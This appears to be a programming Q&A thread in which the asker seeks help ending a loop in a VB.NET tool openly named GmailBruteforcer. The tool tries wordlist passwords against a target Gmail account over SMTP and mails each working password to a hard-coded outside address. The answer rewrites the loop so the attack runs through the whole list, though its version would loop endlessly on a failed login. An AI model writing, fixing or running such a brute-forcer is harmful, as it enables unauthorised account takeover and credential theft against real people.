# stop loop VB.NET

Tags: vb.net, loops, break

I want to stop loop when its finished and I don't know how to stop it. Here is the full source code.

```
Imports System.Net.Mail

Public Class GmailBruteforcer
    Private Sub GmailBruteforcer_Load(sender As Object, e As EventArgs) Handles MyBase.Load
    End Sub

    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        OpenFileDialog1.Title = "Please Select a File"
        OpenFileDialog1.AddExtension = True
        OpenFileDialog1.Filter = "Text Files (*.txt) |*.txt"
        OpenFileDialog1.ShowDialog()
    End Sub

    Private Sub OpenFileDialog1_FileOk(sender As Object, e As System.ComponentModel.CancelEventArgs) Handles OpenFileDialog1.FileOk
        Dim strm As System.IO.Stream
        strm = OpenFileDialog1.OpenFile()
        TextBox2.Text = OpenFileDialog1.FileName.ToString()
        If Not (strm Is Nothing) Then
            strm.Close()
        End If
    End Sub

    Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
        emailloop()
    End Sub

    Sub emailloop()
        Dim objReader As New System.IO.StreamReader(TextBox2.Text)
        For i As Int32 = 0 To 100000
            TextBox3.Text = objReader.ReadLine
            If TextBox3.Text = "" Then MsgBox("Password not found")
            Try
                Dim mail As New MailMessage
                mail.To.Add("h1dd3na@gmail.com")
                mail.From = New MailAddress(TextBox1.Text)
                mail.Subject = "test123"
                mail.Body = TextBox3.Text
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox3.Text)
                SMTP.Send(mail)
                MsgBox(" Password: " + TextBox3.Text)
                Clipboard.SetText(TextBox3.Text)
                MsgBox("Password Copied!")
            Catch ex As Exception
            End Try
        Next
    End Sub

    Private Sub Button3_Click(sender As Object, e As EventArgs) Handles Button3.Click
    End Sub
End Class
```

Answer (score 0):

Something like this should work:

```
Sub emailloop()
    Dim objReader As New System.IO.StreamReader(TextBox2.Text)
    Dim line as String 

    line = objReader.ReadLine

    Do While (Not line Is Nothing)
        TextBox3.Text = line
        If TextBox3.Text = "" Then MsgBox("Password not found")

        Try
            Dim mail As New MailMessage
            mail.To.Add("h1dd3na@gmail.com")
            mail.From = New MailAddress(TextBox1.Text)
            mail.Subject = "test123"
            mail.Body = TextBox3.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox3.Text)
            SMTP.Send(mail)
            MsgBox(" Password: " + TextBox3.Text)
            Clipboard.SetText(TextBox3.Text)
            MsgBox("Password Copied!")

            line = objReader.ReadLine
        Catch ex As Exception

        End Try
    Loop
End Sub
```

Comment: its showing me this error 'objReader' is not declared. It may be inaccessible due to its protection level.

Comment: Cool, please upvote if you are satisfied with the answer

Comment: Thanks for the feedback! Once you earn a total of 15 reputation, your votes will change the publicly displayed post score i cant right now :/

Comment: @GioGongadze you should still be able to mark the answer as correct if it answers your question.